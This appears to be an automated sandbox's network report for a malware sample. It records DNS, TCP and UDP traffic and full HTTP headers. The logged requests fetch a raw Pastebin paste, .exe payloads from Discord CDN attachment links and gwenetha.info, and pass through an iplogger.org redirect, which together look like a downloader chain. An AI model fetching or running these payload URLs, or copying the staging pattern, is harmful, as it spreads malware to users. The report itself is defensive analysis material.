Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
gwenetha.info | 104.21.12.27 | |
pastebin.com | 104.23.98.190 | |
iplogger.org | 88.99.66.31 | |
cdn.discordapp.com | 162.159.133.233 | |
whatitis.website | | |
TCP Requests

Source | Destination | Host |
---|---|---|
192.168.56.101:49202 | 104.21.12.27:443 | gwenetha.info |
192.168.56.101:49201 | 104.23.99.190:443 | pastebin.com |
192.168.56.101:49203 | 162.159.130.233:443 | cdn.discordapp.com |
192.168.56.101:49204 | 162.159.130.233:443 | cdn.discordapp.com |
192.168.56.101:49206 | 162.159.130.233:443 | cdn.discordapp.com |
192.168.56.101:49207 | 162.159.130.233:443 | cdn.discordapp.com |
192.168.56.101:49205 | 88.99.66.31:443 | iplogger.org |
UDP Requests

Source | Destination |
---|---|
192.168.56.101:54056 | 164.124.101.2:53 |
192.168.56.101:55450 | 164.124.101.2:53 |
192.168.56.101:59369 | 164.124.101.2:53 |
192.168.56.101:61479 | 164.124.101.2:53 |
192.168.56.101:62324 | 164.124.101.2:53 |
192.168.56.101:65329 | 164.124.101.2:53 |
192.168.56.101:137 | 192.168.56.255:137 |
192.168.56.101:138 | 192.168.56.255:138 |
192.168.56.101:49152 | 239.255.255.250:3702 |
192.168.56.101:62325 | 239.255.255.250:3702 |
192.168.56.101:62445 | 239.255.255.250:1900 |
192.168.56.101:62447 | 239.255.255.250:3702 |
192.168.56.101:62449 | 239.255.255.250:3702 |
52.231.114.183:123 | 192.168.56.101:123 |

HTTP Requests
GET 200 https://pastebin.com/raw/gCyjHCCH

Request:
GET /raw/gCyjHCCH HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive

Response:
HTTP/1.1 200 OK
Date: Wed, 07 Apr 2021 07:29:04 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d57b9f7a7ce498368d7ec166f955ad5ea1617780544; expires=Fri, 07-May-21 07:29:04 GMT; path=/; domain=.pastebin.com; HttpOnly; SameSite=Lax; Secure
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 186
cf-request-id: 094cd52bbf00000aa067030000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 63c18af2cb410aa0-NRT

GET 200 https://cdn.discordapp.com/attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe

Request:
GET /attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive

Response:
HTTP/1.1 200 OK
Date: Wed, 07 Apr 2021 07:29:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d56c6c0c019e6087c43f6efc62835d5af1617780565; expires=Fri, 07-May-21 07:29:25 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
cf-request-id: 094cd57c7a000012d23c232000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=9fhp%2B8Q6XujR9zegqsS2u3cptw%2BWH5u8HMWA4KDoZqLB8TOZcYeyABg39vKh%2FU0u%2Fh2%2BiNFkFRJIjmMOjU7K2yeMWwLjCrGqgQEfRCWZhBl1gH0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 63c18b73fd8c12d2-ICN
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400

GET 403 https://cdn.discordapp.com/attachments/826198252025675816/826538114838298715/install_setupVPSfree.exe

Request:
GET /attachments/826198252025675816/826538114838298715/install_setupVPSfree.exe HTTP/1.1
Host: cdn.discordapp.com

Response:
HTTP/1.1 403 Forbidden
Date: Wed, 07 Apr 2021 07:29:25 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=d56c6c0c019e6087c43f6efc62835d5af1617780565; expires=Fri, 07-May-21 07:29:25 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63c18b74cf9412d2-ICN
Age: 181
Cache-Control: private, max-age=0
Expires: Wed, 07 Apr 2021 07:26:24 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 094cd57d00000012d263903000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-UzC1KBhY3X93ZfgnDjAnmuJUUPhz5lTweFLJDnx62i8fBT7t150dgoc8Am33Mgz22RUdaEMPPHHUNrIU0UA68-7Mx7egA
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=gchdgqXqrJWK9Xt3zii0eM%2BnwSLnYll7FNGjOn3L%2FBM3BpnDPsfi%2F7a%2FPQVOkGj1FtU6cPciQSL%2Bx0z3z3oOQjleE0WCCu4Z%2BIN5RL1wan8SPws%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare

GET 403 https://cdn.discordapp.com/attachments/826416818390040589/826855866228670474/7525b875715555.exe

Request:
GET /attachments/826416818390040589/826855866228670474/7525b875715555.exe HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive

Response:
HTTP/1.1 403 Forbidden
Date: Wed, 07 Apr 2021 07:29:25 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=dc1eae5575332249e94b56aa3d43b59ab1617780565; expires=Fri, 07-May-21 07:29:25 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63c18b764999015c-ICN
Age: 186
Cache-Control: private, max-age=0
Expires: Wed, 07 Apr 2021 07:26:19 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 094cd57de90000015ca4251000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-UykRmi-WcIPmndR-30cgsUwYoAaQTf8_c69eRGW0hmeP_rZVYE5HeASLfpkDP0ON1RIjo2sXn-IJ3IzxuqVFm5xzvxxOQ
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=oqo76HV4uegcNIEESgNV3HBkXwqgqmsTd1knz4MGF1uLsKPHRYSk2jsliK8cic2u52PPqGm2WXFApT6jI1zogX5b3VhDtcAjktNJL1nYKSM3zmg%3D"}]}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare

GET 404 https://gwenetha.info/setup-KGQJ-1.exe

Request:
GET /setup-KGQJ-1.exe HTTP/1.1
Host: gwenetha.info
Connection: Keep-Alive

Response:
HTTP/1.1 404 Not Found
Date: Wed, 07 Apr 2021 07:29:29 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 19
Connection: keep-alive
Set-Cookie: __cfduid=d953faefc72fa291325c1173a4d3c7d851617780568; expires=Fri, 07-May-21 07:29:28 GMT; path=/; domain=.gwenetha.info; HttpOnly; SameSite=Lax
X-Content-Type-Options: nosniff
CF-Cache-Status: DYNAMIC
cf-request-id: 094cd58ab3000042f42eaa2000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=zVvThRsGDP67l4hbw48kKdoqubUn1BWHt1AzKS3g%2B2pMr6ga0XKsUPKFG46G%2FYryf%2B4cs%2ByxorBVAGdvLYDqqDIwrvC86y5d0%2BrMFwoR"}],"group":"cf-nel","max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 63c18b8ab93b42f4-LAX
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400

GET 301 https://iplogger.org/2LehR6.exe

Request:
GET /2LehR6.exe HTTP/1.1
Host: iplogger.org
Connection: Keep-Alive

Response:
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 07 Apr 2021 07:29:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=r3l2sf7vur9m5egnd9nko22na7; path=/; HttpOnly
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=261267619; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Location: https://cdn.discordapp.com/attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY

GET 200 https://cdn.discordapp.com/attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe

Request:
GET /attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe HTTP/1.1
Host: cdn.discordapp.com

Response:
HTTP/1.1 200 OK
Date: Wed, 07 Apr 2021 07:29:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d857c2c951baa829a94f9efcee41657761617780591; expires=Fri, 07-May-21 07:29:51 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
cf-request-id: 094cd5e19c0000352c0b93b000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=frP4p3Plt637OvL6wEcoWyqPFx4SQ48fDr8Rg4MjKK6NtIVTjXlsH1oyn013PM2RA0SNudNGH2XUFlts5ME%2FNBKE%2B6ZuOXE7ZHruni2%2FGXOSq5c%3D"}],"max_age":604800,"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 63c18c15c81d352c-ICN
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400

GET 403 https://cdn.discordapp.com/attachments/826416818390040589/826469949593485312/file.exe

Request:
GET /attachments/826416818390040589/826469949593485312/file.exe HTTP/1.1
Host: cdn.discordapp.com

Response:
HTTP/1.1 403 Forbidden
Date: Wed, 07 Apr 2021 07:29:59 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=d8b2dbfb58efa3f64a880afc1b071558b1617780599; expires=Fri, 07-May-21 07:29:59 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63c18c4bd952352c-ICN
Age: 198
Cache-Control: private, max-age=0
Expires: Wed, 07 Apr 2021 07:26:41 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 094cd603670000352cf63dd000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-Uyuy8pMG7n-CGKxICK6tgp4j-SbMWRPCEYaHio3B0qeSrj2eTR4Ksr3gQERkx14ybX9I-q3QbGYJgO5pJwX5QlK5uWdnw
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=tn7J8m5JWo7M%2BxJ%2BVEzt%2BVn2Tz%2FMPbqnpKTIQTgJJ%2FyzbZ2M39XmumeMpwyliMvOtVtX3jV0Lzcu6CL3vNTYdpHZL%2F7A2O5Ivgxh4duhv6fqSUk%3D"}],"max_age":604800,"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare

GET 403 https://cdn.discordapp.com/attachments/826416818390040589/826540039764705360/7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe

Request:
GET /attachments/826416818390040589/826540039764705360/7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe HTTP/1.1
Host: cdn.discordapp.com

Response:
HTTP/1.1 403 Forbidden
Date: Wed, 07 Apr 2021 07:30:03 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=d8cd3efafbc3c2e8aaf2fe067898c14911617780602; expires=Fri, 07-May-21 07:30:02 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63c18c60afef0a3c-KIX
Cache-Control: private, max-age=0
Expires: Wed, 07 Apr 2021 07:30:03 GMT
Vary: Accept-Encoding
CF-Cache-Status: EXPIRED
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 094cd6106a00000a3cf292e000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-Uylca6nICAn3ovtUook9jVr0eBfrVr4RYgZ1d4zNcD-wP8GTj1UpuW_qeGfyGMDkdjXM8WgV9XJYa5ru7ka-DwwhZEX1A
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=BMLa3zPnFAakv1%2BfNEHdo%2By8%2F9lPMCq%2FFMznZRWQwTvrrNq7Pw9JMWHQHerD8S6zLixywomVdZAvZu6aR0JSB47VHLYFOZ%2B03KFxhF%2F7PVKgj7E%3D"}]}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare

ICMP traffic: No ICMP traffic performed.

IRC traffic: No IRC requests performed.

Suricata Alerts: No Suricata Alerts

Suricata TLS: No Suricata TLS

Snort Alerts: No Snort Alerts